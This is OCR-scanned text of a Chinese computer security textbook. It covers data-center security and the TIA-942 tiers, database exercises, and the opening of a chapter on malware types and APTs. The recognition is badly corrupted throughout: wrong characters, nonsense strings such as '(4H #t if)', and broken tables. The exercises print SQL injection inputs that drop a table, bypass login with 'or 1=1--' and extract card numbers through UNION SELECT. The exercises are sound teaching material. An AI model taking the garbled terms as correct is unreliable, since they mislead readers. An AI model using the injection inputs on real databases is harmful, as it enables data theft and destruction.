e 交叉 连接 器 (cross connect): 能 够 作为 电缆 终端 ， 也 能 够 和 其 他 电缆 或 设备 互联 的 
设备 。 
e 水 平 电缆 (horizontal cabling): 指 任何 用 于 将 楼 层 布线 室 连 接 到 工作 区 域 中 的 墙 体 的 电 
缆 ， 目 的 是 将 服务 器 和 其 他 数字 设备 连接 到 网 络 的 局 域 网 ( LAN)。 这 里 的 “水 平 ”是 
指 这 样 的 电缆 通常 是 沿 天 花 板 或 地 板 进行 布线 的 。 
e 主干 电缆 (backbone cabling): 用 于 连接 数据 中 心房 间或 围墙 和 建筑 物 的 主要 交叉 连接 器 。 


58.2 ”数据 中 心安 全 注意 事项 


本 书 中 讨论 的 所 有 安全 威胁 和 对 策 都 与 大 型 数据 中 心 环境 有 关 ， 这 也 确实 是 最 具 风 险 之 
处 。 数 据 中 心 容 纳 了 大 量 的 数据 ， 这 些 数据 具有 以 下 属性 : 


120 B-RA HHEMZEARKARE 


附加 机 架 企业 网 络 





N x 100Gbps —— 7 eoe 






10Gbps 
& 
40Gbps 一 > 


图 5-11 关键 数据 中 心 要 素 


e 位 于 一 个 有 限 的 物理 空间 之 内 。 

e 与 直 连 电缆 (direct-connect cabling) 相互 连接 。 

e 通过 外 部 网 络 连接 可 以 访问 ， 所 以 一 旦 跨越 边界 就 会 对 整体 造成 威胁 。 

。 通常 代表 着 企业 最 大 的 单 件 资产 。 

因此 ， 数 据 中 心安 全 是 任何 具有 大 型 数据 中 心 的 企业 的 首要 任务 。 一 些 必须 考虑 的 重要 威 
胁 包 括 : 

e 拒绝 服务 

e 来 目 针 对 性 攻击 的 高 级 持续 性 威胁 
隐私 泄露 
应 用 漏洞 (如 SQL 注入) 
恶意 软件 

e 物理 安全 威胁 

图 5-12 强调 了 数据 中 心安 全 的 重要 方面 ， 将 其 描绘 为 一 个 四 层 模 型 。 场 地 安全 主要 指 整 
个 现场 (包括 容纳 数据 中 心 的 建筑 物 ) 的 物理 安全 性 ， 以 及 宛 余 设施 的 使 用 情况 。 数 据 中 心 自 
身 的 物理 安全 包括 进入 屏障 ， 例 如 一 个 双 门 互 锁 (一 个 双 门 单 人 访问 控制 空间 ) 再 加 上 获得 物 
理 访问 的 认证 技术 。 物 理 安 全 还 包括 安全 人 员 、 监 视 系 统 和 其 他 措施 ， 我 们 将 在 第 16 章 中 进 
行 详细 讨论 。 网 络 安 全 在 一 个 设施 中 是 非常 重要 的 ， 在 这 些 设施 中 ， 如 此 庞大 的 资产 集合 集中 
在 一 个 单一 的 区 域 ， 并 且 可 以 通过 外 部 网 络 连 接 访 问 。 通 常 ， 大 型 数据 中 心 将 采用 本 文 讨论 的 
所 有 网 络 安 全 技术 。 最 后 ， 数 据 自 身 的 安全 与 它们 所 在 的 系统 的 安全 不 同 ， 涉 及 本 章 其 余部 分 
所 讨论 的 技术 。 





阻碍 ， 元 余 设 施 ， 景 观 ， 缓 冲 区 域 ， 





图 5-12 ”数据 中 心安 全 模型 


5.8.3 TIA-942 
电信 工业 协会 (TIA) 标准 TIA-942 (数据 中 心 电 信 基础 设施 标准 ) 规定 了 数据 中 心 电 信 基 
础 设施 的 最 低 要 求 。 包 括 以 下 主题 : 
o 网 络 架 构 
电气 设计 
文件 存储 、 备 份 及 归档 
系统 元 余 
网 络 访问 控制 和 安全 
数据 库 管 理 
虚拟 主机 
应 用 托管 
内 容 分 发 
环境 控制 
防止 物理 灾害 (火灾 、 洪 水 和 风暴 ) 
e 电源 管理 
该 标准 规定 了 功能 区 域 ， 这 有 助 于 根据 常规 商业 空间 的 标准 分 层 设 计 来 定义 设备 的 放置 。 
该 体系 结构 可 以 进一步 进行 扩展 ， 并 有 助 于 创建 一 个 环境 ， 使 应 用 和 服务 器 在 最 短 停机 时 间 内 
新 增 和 升级 。 这 种 标准 化 的 方法 具有 很 高 的 可 用 性 并 为 实施 安全 措施 提供 了 统一 的 环境 。TIA- 
942 规定 了 数据 中 心 应 当 包 括 如 下 功能 区 域 ( 见 图 5-13 ): 
e 计算 机 机 房 : 数据 中 心 的 一 部 分 ， 可 以 容纳 数据 处 理 设备 。 
e 接 入 室 (entrance room): 一 个 或 多 个 接 人 室 设 有 外 部 网 络 接 和 提供 商 设 备 ， 并 提供 计 
算 机 机 房 设备 与 企业 电缆 系统 之 间 的 接口 。 接 入 室 与 计算 机 机 房 的 物理 隔离 提供 了 更 
好 的 安全 性 。 
e 主要 分 布 区 : 一 个 容纳 主要 交叉 连接 需 以 及 用 于 LAN 与 SAN (Storage Area Network) 
基础 设施 的 核心 路 由 器 和 交换 机 的 中 央 区 域 。 
© 水 平分 布 区 (HDA): 此 区 域 包 括 水 平 电缆 和 房屋 交叉 连接 器 的 分 布点 ， 以 及 用 于 将 电 
缆 分 配 到 设备 分 布 区 的 有 源 设备 。 
e 设备 分 布 区 (EDA): 指 包 含 用 配 线 架 (patch panel) 断 开 的 水 平 电 缆 的 设备 机 柜 与 机 架 
的 区 域 。 
e 区 域 分 布 区 (ZDA): HDA 和 EDA 之 间 水 平 电缆 中 的 可 选 互 联 点 。ZDA 可 以 充当 重新 
配置 灵活 性 的 集合 点 ， 也 可 以 用 于 安装 大 型 机 等 独立 设备 。 
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图 5-13 TIA-942 合 规 的 数据 中 心 显示 的 关键 功能 区 域 


个 重要 部 分 (尤其 与 计算 机 安全 相关 的 ) 是 可 靠 性 等 级 。 
等 级 ， 如 表 5-4 所 示 。 对 于 这 四 个 等 级 中 的 每 一 


机 械 和 电信 的 推荐 标准 ， 等 级 越 高 则 可 用 性 越 高 。 


R 5-4 TIA-942 中 定义 的 数据 中 心 等 级 


该 标准 定义 了 四 个 


级 ，TIA-942 详细 撕 述 了 建筑 、 安 全 、 电 气 、 


等 ”级 系统 设计 可 用 性 /每 年 停机 时 间 


容易 受到 计划 和 非 计 划 活 动 的 干扰 
为 电源 和 制冷 分 配 单一 路 径 ， 无 元 余 组 件 
可 能 会 或 可 能 不 会 有 活动 地 板 、UPS 或 发 电机 
需要 3 个 月 的 时 间 来 实施 
必须 完全 关闭 以 执行 预防 性 维护 
受到 计划 内 和 计划 外 活动 的 干扰 
为 电源 和 制冷 分 配 单一 路 径 ， 包 含 宛 余 组 件 
包含 活动 地 板 、UPS 和 发 电机 
需要 3 到 6 个 月 实施 
电力 和 基础 设施 的 其 他 部 分 的 维护 需要 关机 进行 


在 不 中 断 计 算 机 硬件 操作 的 情况 下 局 用 计划 的 活动 ， 但 未 计划 的 
事件 仍 会 导致 中 断 

多 电源 和 制冷 分 配 路 径 , 但 是 只 有 一 个 路 径 有 效 ， 包含 元 余 组 件 
需要 15 到 20 个 月 实施 

包含 活动 地 板 、 充 足 的 生产 和 分 配 能 力 ， 以 便 在 一 个 路 径 上 承载 
负载 ， 同 时 在 男 一 个 路 径 上 执行 维护 


计划 的 活动 不 会 中 断 关 键 负载 ， 并 且 数 据 中 心 可 以 承受 至 少 一 
最 严重 的 计划 外 事件 而 不 会 对 关键 负载 产生 影响 

多 有 效 电 源 和 制冷 分 配 路 径 ， 包含 元 余 组 件 

需要 15 至 20 个 月 实施 





99.671%/28.8 小 时 


99.741%/22.0 小 时 


99.982%/1.6 小 时 


99.995%/0.4 小 时 


5.9 关键 术语 、 复 习题 和 习题 


关键 术语 

attribute (属性 ) 

blind SQL injection ( 育 SQL 注入 ) 

cascading authorization (级 联 授 权 ) 

compromise (危害) 

data center (数据 中 心 ) 

data swapping (数据 交换 ) 

database (数据 库 ) 

database access control (数据 库 访 问 控 制 ) 

database encryption (数据 库 加 密 ) 

DataBase Management System (DBMS， 数 据 库 管 
理 系 统 ) 

defensive coding (防御 性 编码 ) 

detection (检测 ) 

end-of-line comment ( 行 尾 注 释 ) 

foreign key (外 键 ) 

inband attack ( 带 内 攻击 ) 

inference (推理 ) 

inference channel (推理 通道 ) 


复习 题 
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inferential attack (推理 攻击 ) 

out-of-band attack (人 带 外 攻击 ) 

parameterized query insertion (参数 化 查询 搬入) 

partitioning (划分 ) 

piggybacked queries (4H #t if) ) 

primary key (主键 ) 

query language (查询 语言 

query set (查询 集 ) 

relation (关系 ) 

relational database (关系 型 数据 库 ) 

relational database management system ( RDBMS, 
关系 型 数据 库 管理 系统 ) 

run-time prevention (运行 时 防御 ) 

Structured Query Lanauage (SQL， 结 构 化 查询 语言 ) 

SQL injection (SQLi) attack (SQL 注入 攻击 ) 

tautology (EFA) 

tuple (元 组 ) 

view (视图 ) 


5.1 解释 下 列 术语 : 数据 库 、 数 据 库 管理 系统 和 查询 语言 。 


52 ”什么 是 关系 数据 库 ? 它 的 主要 组 成 要 素 是 什么 ? 


5.3 关系 数据 库 中 ， 一 个 表 可 以 有 多 少 个 主键 和 多 少 个 外 键 ? 


5.4 ” 列 出 并 简要 描述 RDBMS 可 以 使 用 的 管理 策略 。 


5.5 解释 级 联 授 权 的 概念 。 

5.6 解释 RDBMS 的 推理 威胁 的 本 质 。 

5.7 数据 库 加 密 的 缺点 是 什么 ? 

5.8 列 出 并 简要 定义 数据 中 心 可 用 性 的 四 个 等 级 。 


习题 


5.1 考虑 一 个 简化 的 大 学 数据 库 ， 其 中 包括 关于 课程 (名 字 、 编 号 、 日 期 、 时 间 、 房 间 号 、 最 大 注册 人 
数 )、 讲 课 的 教师 和 听课 的 学 生 的 信息 。 给 出 一 个 有 效 管理 这 些 信 息 的 关系 数据 库 。 


5.2 下 表 提 供 了 一 个 登山 俱乐部 成 员 的 信息 。 


Climber-ID 
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3.3 


5.4 
5.5 


5.6 


= 


5.8 


主键 是 Climber-ID。 解 释 下 面 各 行 能 否 被 添加 到 表 中 。 


: 


下 面 这 张 表 是 兽医 服务 机 构 使 用 的 ， 其 中 列 出 了 一 些 宠物 及 其 主人 的 信息 。 


Woolley ca | Unknown mt@abc.com 


a. 描述 使 用 这 个 表 时 可 能 出 现 的 四 个 问题 。 

b. 把 这 个 表 分 解 成 两 个 表 ， 以 解决 上 述 提 到 的 四 个 问题 。 

我 们 想 要 创建 Student 表 ， 其 中 包括 学 生 ID 号 、 姓 名 和 电话 号 码 。 写 出 实现 这 个 功能 的 SQL 语句 。 
考虑 如 下 的 SQL 语句 : 

SELECT id firstname, surname FROM authors WHERE firstname ='john' AND 

Surname ='smith' 

a. 该 SQL 语句 要 做 什么 事情 ? 

b. 假设 firstname 和 surname 字段 是 从 用 户 提供 的 输入 中 提取 的 ， 如 果 用 户 的 应 答 分 别 是 : 


Firstname: jo’ hn 


Cedro 


Surname; smith 
这 对 查询 的 影响 是 什么 ? 
c. 现在 假定 用 户 的 应 答 是 : 
Firstname: jo'; drop table authors-- 
Surname; smith 
这 样 做 对 查询 的 影响 是 什么 ? 
图 5-14 是 一 段 代 码 ， 其 目标 是 实现 对 某 个 数据 库 应 用 程序 的 登录 功能 。 这 段 代码 动态 地 构建 了 一 个 
SQL 查询 并 提交 给 数据 库 。 
a. 假设 用 户 提 交 了 登录 的 用 户 名 、 密 码 和 个 人 识别 码 ， 分别 是 doe、secret 和 123。 给 出 所 需要 的 
SQL 查询 语句 。 
b. WRAPS login 字段 提交 的 是 'or 1 二 1--， 这 时 对 查询 结果 的 影响 是 什么 ? 
SQL 命令 字 UNION 是 用 于 合并 两 个 或 多 个 SQL SELECT 语句 的 选择 结果 的 。 在 如 图 5-14 所 
示 的 登录 代码 中 ,假设 用 户 在 登录 字段 中 键入 的 内 容 如 下 : 
'UNION SELECT cardNo from CreditCards WHERE acctNo=10032-- 
结果 如 何 ? 
假定 A. B 和 C 把 Employee 表 的 某 些 特权 授予 X，X 又 把 这 些 特权 授予 Y， 如 下 表 所 示 ， 其 中 的 
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数值 项 表示 授权 的 时 间 : 


ion | | Sane | eo | | ee 
MEE E 

在 t=35 时 刻 ，B 发 出 命令 REVOKE ALL RIGHTS ON Employee FROM X。 使 用 5.2 节 定 义 的 约定 ， 

Y 的 哪些 访问 权 必 须 被 收回 (如 果 有 的 话 ) ? 





5-14 产生 SQL 查询 的 代码 段 


5.9 图 5-15 给 出 了 一 个 表 的 指定 访问 权 的 授权 操作 序列 。 假 定 在 t=70 时 刻 B 收回 C 的 访问 权 。 使 用 
5.2 节 定 义 的 约定 ， 给 出 访问 权 依赖 的 结果 图 。 





图 5-15 ”级 联 特 权 
5.10 ”图 5-16 给 出 了 图 5-6 所 示 情 况 的 回收 处 理 的 男 一 种 约定 。 





图 5-16 Bob 收回 David 的 特权 , 第 2 版 
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5.11 


5.12 


5.13 


5.14 


5.15 


a. 描述 符合 这 张 图 的 回收 算法 。 

b. 比较 这 种 方法 与 图 5-6 所 示 原 始 方法 的 相对 优点 和 缺点 。 

考虑 一 个 管道 工程 公司 的 零件 部 门 。 该 部 门 维护 一 个 库存 数据 库 ， 其 中 包括 零件 信息 (零件 号 、 描 
述 信 息 、 颜 色 、 尺 寸 、 库 存 数 等 ) 和 供应 商 信息 (名 字 、 地 址 、 待 办 采购 单 、 已 结案 采购 单 等 )。 
在 RBAC 系统 中 ， 假 设 为 应 付 员 、 安 装 组 长 和 收 货 员 分 别 定义 角色 。 对 每 种 和 角色， 指出 可 以 只 读 
和 读 写 访问 哪些 数据 项 。 

假设 你 是 一 个 军事 运输 系统 的 数据 库 管理 员 。 在 你 的 数据 库 中 有 一 个 名 为 “货物 ”的 表 ， 其 中 包 
含 每 架 出 发 飞机 里 装载 的 各 种 货物 的 信息 。 表 中 的 每 行 表 示 一 批 货物 ， 并 列 出 了 该 批 货物 的 内 容 
和 航班 标识 号 。 每 个 货舱 仅 被 允许 装 一 批 货物 。 航 班 标识 号 可 以 与 其 他 表 交 叉 参 照 ， 以 确定 出 发 
地 、 目 的 地 、 航 班 时 刻 及 其 他 类 似 数据 。 货 物 表 如 下 : 


Fight D Classification 


假设 定义 两 个 角色 : 角色 1 具有 对 货物 表 的 完全 访问 权 ， 和 角色 2 仅 对 Classification 字段 的 值 为 
Unclassified 的 行 具有 完全 访问 权 。 描 述 一 个 情景 被 分 配 了 角色 2 的 用 户 可 以 通过 一 个 或 多 个 查 
询 确 定 装 入 飞机 的 货物 中 是 否 包含 机 密 货 物 。 

FAP hulkhogan 和 undertaker 不 具有 对 Inventory 表 和 Item 表 的 SELECT 访问 权 。 这 些 表 是 由 用 户 
bruno-s 创建 和 拥有 的 。 写 出 能 使 bruno-s 向 hulkhogan 和 undertaker 授予 对 这 些 表 的 SELECT 访问 
权 的 SQL 命令 。 

5.6 节 列 举 的 例子 中 提 到 在 定义 职工 信息 的 一 组 表 中 增加 Start-Date 列 的 问题 ， 一 种 直接 除去 推理 
通道 的 方法 是 将 Start-Date 列 加 到 Employees 表 。 提 出 另外 一 种 办 法 。 

考虑 包括 工资 属性 的 数据 库 表 。 假 定 三 个 查询 sum, count 和 max ( 按 此 顺序 ) 针对 工资 属性 做 出 ， 
所 有 查询 中 涉及 其 他 属性 的 谓词 逻辑 都 相同 。 也 就 是 说 ， 选 出 一 个 特定 的 记录 子 集 ， 三 个 查询 都 
在 该 子 集 上 执行 。 假 设 前 两 个 查询 被 回答 ， 第 三 个 查询 被 拒绝 。 有 信息 被 泄露 吗 ? 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
描述 恶意 软件 所 使 用 的 三 类 传染 机 制 ; 
理解 病毒 、 蠕 虫 和 木马 的 基本 运行 方式 ; 


描述 恶意 软件 的 四 种 载荷 ; 

理解 僵尸 程序 、 间 谍 软 件 和 rootkit 导致 的 不 同 威胁 ; 
描述 对 恶意 软件 的 应 对 措施 的 部 分 组 成 要 素 ; 

描述 部 署 恶 意 软 件 检测 机 制 的 三 个 位 置 。 


在 所 有 对 计算 机 系统 的 威胁 中 ， 恶 意 软 件 可 以 认为 是 最 重要 的 一 类 。NIST SP 800-83 (£ 
式 机 和 笔记 本 电脑 恶意 软件 事件 预防 和 处 理 指南 ，2013 年 7 月 ) 将 恶意 软件 定义 为 “一 种 被 
(往往 是 秘密 地 ) 植 人 系统 中 ， 以 损害 受害 者 数据 、 应 用 程序 或 操作 系统 的 机 密 性 、 完 整 性 或 
可 用 性 ， 抑 或 对 用 户 实施 骚扰 或 妨碍 的 程序 ”。 因 此 ， 我 们 需要 关注 恶意 软件 对 应 用 程序 、 实 
用 程序 (如 编辑 器 和 编译 器 等 ) 以 及 内 核 级 ( kernel-level) 程序 的 威胁 。 我 们 同时 还 关注 恶意 
软件 在 被 感染 的 或 本 身 即 为 恶意 的 网 站 和 服务 器 上 的 使 用 ， 以 及 其 在 精心 制作 的 用 以 诱骗 用 户 
透漏 敏感 个 人 信息 的 垃圾 邮件 及 其 他 信息 中 的 应 用 。 

本 章 将 详细 阐述 恶意 软件 的 威胁 和 我 们 的 对 策 。 首 先 综述 恶意 软件 的 各 种 类 型 ， 然 后 通过 
恶意 软件 的 传播 感染 途径 和 其 行为 或 有 效 载荷 ( payload) 给 予 其 一 个 广泛 的 分 类 。 传 染 机 制 包 
括 了 病毒 、 蠕 虫 和 木马 的 传染 方式 。 有 效 载荷 包括 系统 损坏 、 僵 尸 程序 、 网 络 钓鱼 、 间 谍 软 件 
和 rootkit。 本 章 还 会 介绍 一 些 对 抗 亚 意 软件 的 措施 。 


6.1 恶意 软件 的 类 型 


在 这 个 领域 中 ， 术 语 的 使 用 存在 着 一 些 问题 。 这 是 因为 缺少 对 这 些 术语 的 通用 约定 ， 而 同 
时 又 存在 着 某 些 类 别 的 交 释 。 表 6-1 列 出 了 有 助 于 理解 这 些 术 语 的 描述 。 


表 6-1 恶意 软件 的 相关 术语 


名 称 描 R 
i ' 指向 商业 性 和 政治 性 目标 、 使 用 多 种 人 侵 技 术 和 恶意 软件 ， 并 在 很 长 一 段 时 间 内 
高 级 持续 性 威胁 (APT) | 发 起 持续 有 效 的 攻击 的 网 络 犯罪 ， 其 元 凶 往往 是 由 国家 支持 的 组 织 
广告 软件 (adware) ne 的 广告 程序 。 它 能 够 产生 弹出 式 广告 或 将 浏览 器 重 定向 到 某 个 商业 
攻击 工具 包 (attack kit) 一 套 通 过 使 用 各 种 传播 和 载荷 机 制 自 动 生 成 新 恶意 软件 的 工具 
Auto-rooter 用 于 远程 人 侵 到 新 的 机 器 上 的 恶意 攻击 工具 
Jal] (BAIT) 能 够 绕 过 正常 安全 检查 的 任何 机 制 ， 它 可 以 允许 未 经 授权 访问 某 些 功能 
FRR (d 在 被 攻击 的 机 器 上 安装 其 他 内 容 的 程序 。 通 常 下 载 器 是 包含 在 恶意 代码 中 的 ， 该 
ownloader ) 


恶意 代码 首先 被 安装 在 被 感染 系统 中 ， 而 后 下 载 大 量 的 恶意 软件 
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(Zz) 
名 称 fi 述 


一 种 利用 受 感 染 网 站 的 攻击 方式 。 当 该 网 站 被 访问 时 ， 被 植 人 其 中 的 恶意 代码 可 


路 过 式 下 载 (divebydownload) | 以 利用 浏览 器 中 的 漏洞 攻击 访问 者 所 在 的 系统 


漏洞 攻击 程序 (exploit) 针对 某 个 或 多 个 漏洞 进行 攻击 的 代码 

洪 泛 攻击 程序 (DoS) 通过 向 联网 的 计算 机 系统 发 送 大 量 数据 包 而 实现 拒绝 服务 攻击 的 程序 

键盘 记录 器 (keylogger) 捕获 受 控 系统 中 键盘 输入 的 程序 

逻辑 炸弹 被 人 侵 者 择 到 正常 软件 中 的 程序 。 当 预定 义 的 条 件 满足 时 ， 有 逻辑 炸弹 被 触发 ， 开 


始 执行 非 授 权 的 操作 ; 其 他 时 间 处 于 休眠 状态 
一 种 使 用 宏 或 脚本 语言 编写 的 病毒 ， 通 常 被 植 入 一 个 文档 中 ， 当 该 文档 被 浏览 或 


宏 病毒 编辑 时 被 触发 和 运行 ， 然 后 复制 自身 至 其 他 的 文档 

cma 能 够 不 加 修改 地 移植 到 不 同类 型 的 系统 平台 上 并 按照 完全 相同 的 语义 执行 的 软件 
(如 脚本 、 宏 或 其 他 可 移植 的 指令 ) 

rootkit 攻击 者 成 功 入 侵 计算 机 系统 并 获得 root 访问 权限 之 后 使 用 的 一 套 攻击 工具 

垃圾 邮件 程序 发 送 大 量 垃圾 邮件 的 程序 


通过 监听 键盘 输入 、 显 示 器 数据 或 网 络 流量 ， 或 通过 搜寻 系统 中 的 文件 获取 敏感 
信息 ， 并 将 收集 到 的 信息 发 送 给 男 一 台 计 算 机 的 软件 


一 种 计算 机 程序 ， 看 上 去 具有 有 用 的 功能 ， 但 还 具有 隐蔽 的 、 潜 在 的 恶意 功能 ， 
特洛伊 木马 这 些 恶 意 功 能 可 以 用 来 避 开 安全 机 制 的 检查 ， 有 时 是 利用 调用 被 感染 系统 的 合法 授 
权 来 实现 的 


在 执行 时 设法 将 自己 复制 到 其 他 可 执行 代码 中 的 恶意 软件 。 如 果 复 制 成 功 ， 就 称 
这 个 可 执行 代码 被 感染 了 。 当 被 感染 的 可 执行 代码 运行 时 ， 病 毒 也 同时 被 执行 

能 够 独立 执行 并 且 可 以 将 自己 完整 的 可 执行 版 本 传播 到 网 络 中 其 他 主机 上 的 计算 
机 程序 ， 通常 通 过 攻击 目标 系统 中 软件 的 漏洞 或 使 用 捕获 的 授权 凭证 来 实现 
僵尸 机 (zombie, bot) 在 被 感染 的 计算 机 中 运行 ， 激 活 后 向 其 他 计算 机 发 动 攻击 的 程序 


6.1.1 恶意 软件 的 粗略 分 类 


许多 作者 试图 对 恶意 软件 进行 分 类 ， 参 见 [HANS04] 的 调查 报告 和 建议 。 即 使 现在 有 很 多 
分 类 方法 ， 但 是 一 个 最 有 效 的 方法 是 将 其 分 为 两 个 大 类 : 一 是 基于 其 向 目标 传播 和 感染 的 方式 
进行 分 类 ; 二 是 在 到 达 目 标 后 ， 基 于 其 工作 方式 或 有 效 载 答 进行 分 类 。 

传播 机 制 包括 对 现 有 可 执行 程序 的 感染 或 由 病毒 翻译 并 随后 传播 至 其 他 系统 的 内 容 。 例 如 
利用 软件 漏洞 (无论 是 从 本 地 发 起 或 借助 蠕虫 、 路 过 式 下 载 等 方式 从 网 络 发 起 ) 来 允许 恶意 软 
件 自我 复制 ;以 及 借助 社会 工程 学 方法 说 服用 户 绕 过 安全 机 制 来 安装 木马 或 啊 应 网 络 钓 鱼 。 

早 些 时 候 的 恶意 软件 分 类 方法 是 依据 恶意 软件 是 否 依附 于 宿主 程序 ， 如 病毒 需要 一 个 条 主 
程序 寄生 ， 而 蠕虫 、 木 马 和 僵尸 程序 可 以 独立 运行 在 系统 上 。 其 他 在 用 的 区 分 方法 是 考虑 该 亚 
意 软件 是 否 可 以 自我 复制 ， 如 木马 或 垃圾 电子 邮件 就 无 法 自我 复制 ， 而 病毒 和 蠕虫 则 相反 。 

恶意 软件 一 旦 到 达 目 标 系统 ， 其 将 表现 出 的 有 效 载 集 的 行为 可 能 包括 : 污染 系统 或 数据 
文件 ; 守 取 服务 使 系统 成 为 僵尸 网 络 中 的 一 个 僵尸 代理 ; DASA. Peale tor SA 
过 键盘 记录 器 或 间谍 软件 获取 的 隐私 信息 ; 以 及 隐蔽 恶意 软件 的 存在 以 防止 其 被 系统 检测 和 
锁定 。 

早期 的 恶意 软件 往往 使 用 单一 的 传染 方法 传播 单一 的 有 效 载体 。 随 着 病毒 技术 的 发 展 进 
化 ， 我 们 发 现存 在 许多 混合 型 的 恶意 软件 ， 它 们 存在 多 种 传播 机 制 和 有 效 载荷 ， 这 增加 了 其 在 


间谍 软件 (spyware) 


病毒 


蠕虫 
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目标 中 传播 和 隐藏 的 能 力 ， 并 表现 出 一 系列 的 行为 。 混 合 攻击 (blended attack) 使 用 了 多 种 传 
播 感染 手段 ， 最 大 化 其 危害 蔓延 的 速度 和 攻击 的 严重 程度 。 一 些 恶 意 软 件 甚 至 存在 一 种 更 新 机 
制 ， 一 旦 被 部 署 ， 它 可 以 改变 传播 机 制 和 有 效 载 答 。 

在 接 下 来 的 小 节 中 ， 我 们 将 研究 多 类 恶意 软件 ， 然 后 对 相应 的 对 抗 手段 进行 讨论 。 


6.1.2 攻击 工具 包 


最 初 ， 恶 意 软件 是 软件 编写 者 为 炫 次 技术 而 开发 和 部 署 的 。 在 20 世纪 90 年 代 早 期 ， 病 
毒 工具 开发 包 的 出 现 改变 了 这 种 情况 ， 而 后 在 21 世纪 初期 出 现 了 更 多 通用 的 攻击 包 ， 这 些 攻 
击 包 在 极 大 程度 上 助长 了 恶意 软件 的 开发 和 部 署 [FOSS10]。 这 些 工具 包 通 常 被 称 为 犯罪 软件 
( crimeware)， 其 包含 了 多 种 传播 机 制 和 有 效 载荷 模块 ， 即 使 新 手 菜 鸟 也 可 以 进行 组 合 、 选 择 和 
部 署 。 工 具 包 也 可 以 通过 最 新 发 现 的 漏洞 定制 恶意 软件 ， 在 该 漏洞 被 发 现 到 打 补 丁 修复 前 这 段 
时 间 内 进行 漏洞 攻击 。 这 些 工 具 包 显著 地 增加 了 有 能 力 部 署 恶意 软件 的 攻击 者 的 数量 。 虽 然 这 
些 工 具 包 制作 的 恶意 软件 往往 不 如 那些 精心 设计 的 恶意 软件 复杂 巧妙 ， 其 所 生成 的 恶意 软件 变 
种 的 绝对 数量 仍然 会 给 对 抗 它们 的 防御 系统 造成 相当 大 的 计 烦 。 

Zeus 犯罪 软件 工具 包 是 攻击 包 中 一 个 突出 的 例子 。 利 用 Zeus 工具 包 ， 制 作出 了 很 多 非常 高 
效 隐秘 的 恶意 软件 ， 助 长 了 很 多 犯罪 活动 ， 如 截获 和 攻击 银行 信用 卡 信息 [BINS10]。2013 年 首 
次 亮相 的 钓鱼 工具 Angler exploit kit 是 2015 年 最 活跃 的 工具 ， 其 利用 Flash 漏洞 来 进行 恶意 传播 。 
该 工具 在 实施 攻击 和 反 措 施 检测 中 具有 较 好 的 复杂 性 和 技术 先进 性 。 尽 管 这 些 特定 的 工具 包 随 
着 攻击 者 年 复 一 年 的 改进 和 提升 一 直 在 完善 ， 但 仍 有 许多 其 他 的 攻击 包 被 广泛 使 用 [SYMA16]。 


6.1.3 攻击 源 


近 几 十 年 来 ， 恶意 软件 开发 发 生 了 一 些 变 化 ， 攻 击 者 由 个 人 的 、 以 炫耀 技术 为 目的 变化 为 
更 加 有 组 织 和 危害 性 更 大 的 攻击 源 。 这 些 攻击 源 中 包含 有 政治 动机 的 攻击 者 、 罪 犯 和 有 组 织 
犯罪 。 这 些 组 织 会 向 公司 、 国 家 、 政 府 的 代理 人 出 售 服务 ， 我 们 会 在 8.1 节 中 对 其 进行 讨论 。 
在 恶意 软件 数量 上 升 的 背后 ， 是 制作 动机 的 改变 ， 这 种 改变 实际 上 催生 了 出 售 攻击 包 的 地 下 经 
济 ， 获 取 受 害 主 机 的 控制 权 和 盗 盘 信息 。 


6.2 高 级 持续 性 威胁 


近年 来 ， 高 级 持续 性 威胁 (Advanced Persistent Threat, APT) 被 人 们 高 度 关注 。 它 并 不 是 
一 种 新 型 的 恶意 软件 ， 而 是 一 个 具有 充足 资源 、 应 用 大 量 人 侵 技 术 和 恶意 软件 的 持续 性 应 用 程 
序 ， 这 个 应 用 程序 具有 选择 的 目标 ， 通 常 是 一 些 政治 或 商业 目标 。APT 通 凋 来 目 国 家 文 持 的 组 
织 ， 有 些 攻 击 也 可 能 来 自 犯罪 企业 。 我 们 将 在 8.1 节 中 讨论 入侵 者 的 类 型 。 

APT 与 其 他 类 型 的 攻击 不 同 之 处 在 于 APT 精心 地 对 目标 进行 选择 ， 具 有 持续 性 ， 通 常 是 
隐秘 的 ， 入 侵 者 在 相当 的 时 期 内 都 要 致力 于 攻击 。 许 多 值得 关注 的 攻击 ,包括 Aurora, RSA, 
APTI 和 Stuxnet 常常 被 当 作 范例 。 这 些 APT 具有 以 下 特征 : 

e 高 级 : 攻击 者 使 用 多 种 入 侵 技 术 和 恶意 软件 ， 如 果 有 需要 还 会 开发 定制 的 恶意 软件 。 

其 中 单一 的 组 件 在 技术 上 也 许 不 先进 ， 但 是 每 个 组 件 都 是 针对 目标 精心 选择 的 。 

o 持续 性 : 攻击 者 用 很 长 时 间 确 定 针对 攻击 目标 的 攻击 应 用 可 以 最 大 化 攻击 成 功 的 概率 。 

攻击 手段 的 种 类 是 逐渐 递增 的 ， 通 常 是 非常 隐秘 的 ， 直 到 目标 被 攻陷 。 

e 威胁 : 针对 选 定 目标 的 威胁 来 自 有 组 织 、 有 能 力 和 有 和 良好 经 济 支持 的 攻击 者 ， 他 们 试 

图 攻陷 这 些 目标 。 在 攻击 过 程 中 ， 攻 击 者 的 积极 参与 极 大 地 提升 了 自动 攻击 工具 的 威 
胁 等 级 ， 也 增加 了 成 功 攻击 的 可 能 性 。 
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损坏 。 使 用 的 攻击 技术 ， 包 括 社会 工程 学 、 钓 鱼 邮 件 、 选 取 目 标 组 织 中 的 人 员 可 能 会 访问 的 网 
站 植 人 下 载 驱 动 。 试 图 利用 老练 的 恶意 软件 ， 通 过 多 种 传播 机 制 和 有 效 载荷 感染 目标 。 一 旦 获 
取 了 目标 组 织 的 系统 初始 权限 ， 攻 击 者 会 利用 更 多 的 攻击 工具 来 维持 和 提升 他 们 的 访问 权限 。 

由 于 此 类 攻击 具有 特定 目标 和 持续 性 ， 因 此 对 其 防御 的 难度 就 会 增加 。 这 需要 将 一 系列 对 
抗 技术 联合 起 来 (本章 后 半 部 分 会 进行 讨论 ) ; 同时 也 需要 通过 培训 提高 相关 员工 的 防范 意识 
来 对 抗 此 类 攻击 (本 书 第 17 章 也 会 有 相关 介绍 )。 即 使 对 当前 最 佳 实践 的 对 策 来 说 ，0-day 漏 
洞 利 用 和 新 型 的 攻击 手段 仍 可 能 会 使 得 攻击 成 功 [SYMA16，MAND13]。 因 此 能 够 检测 、 啊 应 
和 缓解 此 类 攻击 的 多 层 防 护 措施 是 必要 的 。 防 护 措施 需要 监听 恶意 软件 的 命令 和 控制 流 ， 检 测 
渗透 流量 。 


6.3 传播 - 感染 内 容 - 病毒 


